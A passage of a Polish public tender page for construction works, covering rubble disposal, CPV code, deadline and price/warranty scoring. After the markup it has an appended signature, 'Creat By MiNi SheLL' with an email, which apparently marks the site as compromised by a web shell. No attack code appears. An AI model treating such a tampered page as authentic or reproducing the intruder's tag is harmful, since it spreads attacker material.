- wywóz i utylizacje gruzu i materiałów z rozbiórki zgodnie z obowiązującymi przepisami prawa
Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty i materiały 1 pkt. za 3 lata , 5 pkt. za 4 lata , 10 pkt. za 5 lat - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com